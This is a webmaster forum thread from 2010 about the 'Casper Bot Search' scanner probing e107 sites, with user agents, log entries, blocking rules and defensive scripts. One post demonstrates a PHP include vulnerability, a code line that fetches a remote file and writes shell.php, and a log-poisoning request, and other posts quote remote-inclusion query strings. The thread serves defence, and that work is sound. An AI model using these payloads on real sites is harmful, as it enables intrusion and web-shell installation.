casper bot search attempts to infect sites

user agent changing almost daily

10:47 pm on Jun 28, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seem to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?
1:34 pm on June 29, 2010 (gmt 0)

New User

5+ Year Member

joined:Apr 2, 2010
posts:1
votes: 0


One of my web sites was hacked a few hours ago and I think this is done by this bot. Or it just searches for vulnerabilities and reports them to the actual hacker. All files were removed and index.php and casper.php along with some other files were created in the root folder. There was a message like "hacked by casper" inside one of the files.
The site was built on e107, don't remember the actual version but it was definitely not the latest one.
More info is on the [e107.org...] web site.
7:56 pm on June 29, 2010 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:5795
votes: 64


Does the UA string begin with casper?
10:41 pm on June 29, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


If you mean me, keyplyr, the UA I gave in the title is the complete UA. :)

More today, including Russian servers (which seem to predominate) and an Australian server.

BitStrike - what were the logged URLs and querystrings?

Can't see how it could be a hack unless the querystring syntax broke the server? Is there a "ged" within your site's pagenames/querystrings?

I suppose the contact form page could compromise a server if it stores data into a SQL database but then there would have to be a second payload hit, I should have thought, which is a bit wasteful.

Just had another search on google. This forum/topic at the top and thereafter almost nothing but logs until about #60 when it gives a forum reference. Sadly google seems to have screwed up its translation service because it translated german into german (and in another case french into french). They really are getting worse! :(
2:01 am on June 30, 2010 (gmt 0)

New User

5+ Year Member

joined:June 30, 2010
posts:36
votes: 0


Here are the 3 UAs I've found so far:

Casper Bot Search
dex Bot Search
Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

I'm 403'ing anything presenting this user agent, then a script which runs every 15 mins adds a firewall rule for that IP. (They won't even be able to connect to the server, let alone request anything)

I've counted 268 unique IPs since just over a week ago, so I wouldn't be surprised if the requests are coming from compromised boxes.
4:21 pm on June 30, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


I haven't seen dex bot.

I trapped the mozilla one for a couple of reasons without checking further but yes, it does have the contact.php querystring.

147 hits for contact.php, 142 for casper.
10:50 pm on June 30, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


I've had a look at a few logs that google returns in serps. They do not seem to include the /contact.php but always seem to be the same querystring, though I've only checked half a dozen logs. The querystrings in those I looked at carry the word "casper" as in:

/casper/Ckrid1.txt?

(this seems to be a common point in the logs).

I tried looking in the actual file (a gedcom) for the name "casper" and it's not there so another theory bites the dust.

One google posting mentions casper doing a POST but very little other info. A couple of the serps relate it to exploits.

I have now found a couple of other forums saying this is an exploit attempt aimed at various things including PDFs. Type the following, including quotes, into google:

"casper bot search" exploit

One translated site mentions a "casper rule" which defines the life of something: not sure what as I ran out of patience trying to translate a wiki.

What I can't understand is its persistent hits on a single site/page/querystring. Every single hit, apart from the 404s it generates. For any kind of bot or exploit this is stupid.
4:53 pm on July 1, 2010 (gmt 0)

Junior Member

10+ Year Member

joined:June 25, 2005
posts:179
votes: 1


UA of "CASPER RFI CRACK Bot" seems to have been changed.

Yesterday:
$ua->agent('Casper Bot Search');

and
my $uagent = "Casper Bot Search";


Today:
$ua->agent('Mozilla/5.0');

and
my $uagent = "Mozilla/5.0";
7:57 pm on July 2, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Haven't seen that but it's now coming in with exactly the same querystring but with the UA:

sledink bot search

I guess this will morph a few more times as traps develop to kill known UAs. Generalisation helps!
10:24 am on July 3, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 5+ Year Member

joined:Apr 30, 2007
posts:1394
votes: 0


$ua->agent('Casper Bot Search'); ........ etc.


Looks like a classic hack attempt.

example: vulnerable local script contains code
<?php
include($_GET['p'].".php");
?>

Attacker synthesizes user agent code (a sample you may see in the server logs, not encoded; they use all kinds of things)
<?php
fwrite(fopen('shell.php','w'),
file_get_contents('http://www.example.com/injection.txt'));
?>

it is then utilized with a server request from the attacker:
index.php?p=/var/log/apache/access_log%00

executing the PHP code, or trying to see if the scripts disclose any other info.

I hope you get the idea and this is not original by any means; there are lots of discussions over the web if you want to search in depth. The code logged as a UA can have many variations.

Also they're trying different combinations based on server type and application language.
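As an added example that is not part of the thread (and not e107's code): the include pattern quoted in the post above, placed next to a hardened page dispatcher. The pages/ directory, the PAGES map and the function names are assumptions made for this illustration; it assumes PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

// Added example (not from the thread and not e107 code): the include pattern
// quoted in the post above, next to a hardened dispatcher. The pages/ directory,
// the PAGES map and the function names are assumptions made for this example.

// VULNERABLE, as quoted: the request chooses the file that gets included.
// With allow_url_include=On "p" can be a remote URL; with it Off "p" can still
// name a local file, e.g. a log that already contains attacker-supplied text
// (the User-Agent header from the post), which include() will then execute.
function load_page_vulnerable(string $p): void
{
    include($p . ".php");
}

// HARDENED: the request parameter is only ever a lookup key into a fixed map,
// so nothing the client sends is ever concatenated into a path.
const PAGES_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Resolve a page key to an absolute file path, or null if the key is not allowed
// or the file does not resolve to somewhere inside PAGES_DIR.
function resolve_page(string $p): ?string
{
    if (!array_key_exists($p, PAGES)) {
        return null;   // "../", "/var/log/...", "http://", "%00": all rejected here
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$p]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // belt and braces: the file must still live under pages/
    }
    return $path;
}

function load_page(string $p): void
{
    $path = resolve_page($p);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Dispatcher: the same $_GET['p'] parameter as before, now used only as a key.
$p = isset($_GET['p']) && is_string($_GET['p']) ? $_GET['p'] : 'home';
load_page($p);
```

Setting `allow_url_include = Off` in php.ini (the default) closes the remote variant but not the local one, where the attacker's text is already on disk in a log; the lookup table is what closes both, because no request value ever becomes part of a path.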
2:58 pm on July 3, 2010 (gmt 0)

Junior Member

10+ Year Member

joined:June 25, 2005
posts:179
votes: 1


Another UA:
rk q kangen
10:06 pm on July 3, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Three or four variations on "x bot search" UA today. Still hitting the same site.page.querystring exactly with one variation from contact.php to discover.
12:57 am on July 6, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


Yikes!

I haven't been paying attention but this one is nasty

I've seen UAs of "Casper Bot Search", "rk q kangen" and "MaMa CaSpEr"

They're all trying to find ways to upload files to my site such as:
"somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt?"

I would block anything with "/casper/" in the query string as an added measure of protection.
9:42 pm on July 6, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Not just casper. I would suggest anything with "bot search" in the UA as that seems to be common to many (all?) I've seen so far, including "dex" and "plaNETWORK" (sic).

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

All those I've seen seem to come from compromised servers from ThePlanet down to tin-pot little RIP ones I've never encountered before. In fact there have been a lot of the latter!

I've only caught two new IPs today (although several old ones) so perhaps they're running out of server farms I haven't yet blocked.

And most are from server farms, with just two or three from business ranges that are probably running open servers.

I still can't understand why they're only hitting one site out of several dozen, and only a single page. Seems very inefficient to me. But hey! let's root for inefficiency! :)
12:21 am on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:May 31, 2005
posts:1108
votes: 0


Same bot, new UA MaMa CaSpEr
Also pointing a parameter to Ckrid1.txt
9:24 am on July 7, 2010 (gmt 0)

New User

5+ Year Member

joined:Apr 16, 2010
posts:12
votes: 0


Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

How about just allowing several popular bots to access your site? Additionally one could perform a reverse DNS lookup to ensure the origin of that bot.

popular UA: [user-agents.org...]

how to verify bot: [google.com...]

----

Below could be another way to identify a bad bot..

source: Google Webmaster Blog: "In order to fetch from the 'official' Googlebot IP range, the bot has to respect robots.txt and our internal hostload conventions so that Google doesn't crawl you too hard."

then you might create a hidden link > block it via robots.txt > see if any bot reaches that link > get the IP > block it!

just my 2cents
12:30 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


How can you tell if your server has been compromised? We see this bot hitting our logs (only about 30 attempts since June 21st).

I don't see a new "index.php" or "casper.php" in my root. Any other symptoms to watch out for?
12:41 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


It may be worth noting that there is a city named Casper in Wyoming. Not sure if that affects anyone who is blocking "Casper" in the query string.
4:37 pm on July 7, 2010 (gmt 0)

New User

5+ Year Member

joined:Jan 18, 2007
posts:6
votes: 0


It appears to be an e107 issue, with a security bug in contact.php. Another user agent I found is: "kmccrew Bot Search".

@max, symptoms not clear. One may consider blocking POST queries with a user agent as mentioned above (not: query strings).
6:23 pm on July 7, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Ujang, thanks but I have it covered. I'm merely speculating on hits I see and trying to help out here. :)
7:21 pm on July 7, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


One may consider blocking POST queries with a user agent as mentioned above (not: query strings)


The hits on my site aren't POSTs, they are GETs, so the query string is where I block the attack by actually restricting anything with "http:" in the query string to prevent anything from being uploaded, since the rest of the attack vectors seem to be random.

Of course this will break some software/sites so I don't recommend it for everyone, but it stops it cold on my server.
8:41 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


Mine are GET requests as well.
9:26 pm on July 7, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 5+ Year Member

joined:Feb 16, 2007
posts:846
votes: 0


Profo are you sure e107 is related? Haven't seen 'Casper' at all.

e107 probes: e107.css on May 25 to the ip address with the old Toata dragostea UA, and contact.php on June 14 to a handful of domains with a Googlebot UA.
10:35 pm on July 7, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


All the casper hits today were POSTs. Haven't checked earlier logs but the pattern is the same in my security logs and always trying to hit contact.php. The contact.php in the querystring looks like some reaction to the simple POST to contact.php (without a querystring), which precedes the querystring hit. Both hits get 403s.
10:52 pm on July 7, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


OK, I stand corrected, most of the activity today is totally different from the past few days.

Mostly seeing this coming from So. Korea:
"POST /I[DEX]887 HTTP/1.1" "MaMa CaSpEr"


I don't even know what the heck "/I[DEX]887" is or why anyone would try to post to it but those stupid scripts tried about 30 times with some variations.

Also had a couple of "contact.php" hits from Germany with a Firefox UA:
"POST /contact.php HTTP/1.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


Wonder why the sudden shift from GET to POST?

At a minimum the POST no longer exposes the source of the file they're attempting to upload in a log file so it makes it a little harder to figure out the source of the hacked computer and take it down.
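As an added example that is not part of the thread: a small PHP log review script that walks an Apache combined-format access log and flags the indicators posters have reported so far, namely "bot search", "casper" or "kangen" in the User-Agent, "/casper/" in the query string, a query parameter pointing at "http:", and a POST to /contact.php. The function names and the sample log lines are my own; the lines are constructed with documentation IP ranges and are not real log data. It assumes PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

// Added example, not from the thread: flag the request patterns posters reported
// in an Apache combined-format log and group them by client IP. Function and
// field names are my own choices.

const UA_PATTERNS = ['bot search', 'casper', 'kangen'];

// Parse one combined-log line into its fields, or return null if it does not match.
function parse_combined(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    // Split path and query on the first "?" by hand so odd paths such as
    // "/I[DEX]887" cannot upset a URL parser.
    $pos   = strpos($m[4], '?');
    $path  = $pos === false ? $m[4] : substr($m[4], 0, $pos);
    $query = $pos === false ? '' : substr($m[4], $pos + 1);
    return [
        'ip'     => $m[1],
        'method' => $m[3],
        'path'   => $path,
        'query'  => $query,
        'status' => (int) $m[5],
        'ua'     => $m[6],
    ];
}

// Return the indicator names a parsed request trips (empty array = nothing seen).
function indicators(array $r): array
{
    $hits = [];
    $ua = strtolower($r['ua']);                      // "MaMa CaSpEr" and "Casper" both match
    foreach (UA_PATTERNS as $needle) {
        if (strpos($ua, $needle) !== false) {
            $hits[] = 'ua:' . $needle;
            break;
        }
    }
    $q = strtolower(urldecode($r['query']));         // decode %2F etc. before matching
    if (strpos($q, '/casper/') !== false) {
        $hits[] = 'query:/casper/';                  // the Ckrid1.txt pattern
    }
    if (preg_match('#=\s*https?:#', $q)) {
        $hits[] = 'query:remote-url';                // a parameter pointing at another host
    }
    if ($r['method'] === 'POST' && $r['path'] === '/contact.php') {
        $hits[] = 'post:contact.php';
    }
    return $hits;
}

// Walk the log and collect the tripped indicators per client IP.
function scan_log(array $lines): array
{
    $byIp = [];
    foreach ($lines as $line) {
        $r = parse_combined(trim($line));
        if ($r === null) {
            continue;
        }
        foreach (indicators($r) as $h) {
            $byIp[$r['ip']][$h] = true;
        }
    }
    return array_map('array_keys', $byIp);
}

// Constructed sample lines modelled on what the thread describes (not real log data).
$sample = [
    '192.0.2.10 - - [06/Jul/2010:12:57:00 +0000] "GET /somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt? HTTP/1.1" 403 212 "-" "Casper Bot Search"',
    '192.0.2.11 - - [07/Jul/2010:22:35:00 +0000] "POST /contact.php HTTP/1.1" 403 212 "-" "MaMa CaSpEr"',
    '192.0.2.12 - - [07/Jul/2010:22:52:00 +0000] "POST /I[DEX]887 HTTP/1.1" 404 203 "-" "rk q kangen"',
    '198.51.100.5 - - [07/Jul/2010:09:00:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"',
];

// Only the three probing IPs are printed; the ordinary Firefox visit trips nothing.
foreach (scan_log($sample) as $ip => $hits) {
    echo $ip, "\t", implode(',', $hits), PHP_EOL;
}
```

The output is a plain IP list with the reason each one was flagged, which is the input the 15-minute firewall script earlier in the thread needs; matching on the lower-cased User-Agent is what lets one rule cover "Casper Bot Search", "MaMa CaSpEr" and the other spellings at once.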
12:33 am on July 8, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Dec 20, 2004
posts:2377
votes: 0


It seems to have given up our site for now (knock on wood). We last saw it on the 5th when it was still using the GET method.

That is unless it is under a name we have not checked for... which is highly likely.
1:10 pm on July 8, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Mar 23, 2002
posts:659
votes: 0


A few ModSecurity 2.x rules

# ModSecurity 2.x addresses the header as REQUEST_HEADERS:User-Agent (the
# HTTP_User-Agent form is 1.x syntax). Matching is case-sensitive, so "Casper"
# alone would not catch "MaMa CaSpEr", hence the separate "MaMa" rule.
SecRule REQUEST_HEADERS:User-Agent "Casper" "phase:1,deny,log,status:403"
SecRule REQUEST_HEADERS:User-Agent "kangen" "phase:1,deny,log,status:403"
SecRule REQUEST_HEADERS:User-Agent "MaMa" "phase:1,deny,log,status:403"
8:06 pm on July 8, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


Is this casper thing done?

I haven't seen a single hit from any of its variants today.
9:18 pm on July 8, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3089
votes: 2


Still coming as of a couple of hours ago.

If anyone is interested I have two sets of post/querystring data. Quite a difference between the two sets, one of which is an eval of a BASE64 string. Possibly other sets are different again but I only traced two.
8:11 pm on July 9, 2010 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14621
votes: 85


Sharing the post data would be great
Post it and I'll edit if needed